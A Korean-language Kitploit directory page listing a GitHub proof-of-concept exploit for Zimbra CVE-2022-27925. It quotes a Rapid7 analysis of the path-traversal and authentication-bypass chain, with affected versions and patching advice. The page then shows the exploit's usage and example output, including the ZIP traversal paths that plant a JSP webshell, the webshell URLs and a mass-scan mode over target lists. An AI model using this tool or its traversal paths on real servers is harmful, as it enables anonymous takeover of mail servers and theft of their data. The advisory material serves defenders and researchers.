Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/sanan2004/cve-2022-27925
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubsanan2004/cve-2022-27925

CVE-2022-27925

PoC

저장소 보기
32년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-27925

설명

2022년 5월 10일, Zimbra는 Zimbra Collaboration Suite의 여러 취약점을 해결하기 위해 9.0.0 패치 24 및 8.8.15 패치 31 버전을 출시했습니다. 여기에는 CVE-2022-27924(이전에 작성한 글) 및 CVE-2022-27925가 포함됩니다.

처음에 Zimbra는 CVE-2022-27925를 인증된 경로 탐색 공격으로 분류했습니다. 관리 사용자가 Zimbra 계정 권한으로 파일 시스템의 모든 디렉터리에 파일을 쓸 수 있는 취약점이었습니다. 처음에는 관리자만 공격할 수 있다고 여겨졌기 때문에 NVD는 CVSS 기본 점수 7.8을 부여했습니다. 이후 Volexity는 이 취약점을 악용하는 공격자들이 관리자 권한 요구 사항을 우회하는 방법을 찾았음을 발견하고 2022년 8월 10일에 이에 대해 작성했습니다. 이 새로운 인증 우회에는 CVE-2022-37042라는 새로운 식별자가 부여되었습니다.

원래의 경로 탐색 취약점과 새로운 인증 우회를 결합하면, 공격자는 관리자 포트(기본값 7071)를 통해 익명으로 Zimbra Collaboration Suite 시스템을 원격으로 손상시킬 수 있습니다. 최근에 우리가 글을 쓰고 익스플로잇을 작성한 아직 패치되지 않은 권한 상승 취약점과 결합하면, 이 세 가지 취약점은 패치되지 않은 시스템에서 루트 사용자로 원격 코드 실행으로 이어집니다.

공개 권고에는 언급되지 않았지만, 우리의 분석에 따르면 Zimbra Collaboration Suite Network Edition(유료 버전)은 취약하며 Open Source Edition(무료 버전)은 취약하지 않습니다(취약한 mboximport 엔드포인트가 없기 때문입니다). 취약한 버전은 다음과 같습니다:

Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (및 이전 버전)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (및 이전 버전)

이러한 취약점(및 Zimbra의 다른 취약점)은 실제 환경에서 광범위한 악용 대상이 되고 있으므로 가능한 한 빨리 패치하거나 오프라인으로 전환해야 합니다. 손상되었다고 의심되는 경우, Zimbra는 데이터 손실 없이 최신 패치로 Zimbra Collaboration Suite 서버를 처음부터 재구축하는 방법을 제공합니다.

출처: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis

사용법

 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

usage: exploit.py [-h] [-t TARGET] [-l LIST]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URl with protocol HTTPS
  -l LIST, --list LIST  List of targets

실행 예시

root@root# python exploit.py -t zimbra.example.com
_____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925 Sanan Qasim

[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux

root@root# python exploit.py -l targets.txt

 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925 sanan Qasim

[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
도구 다운로드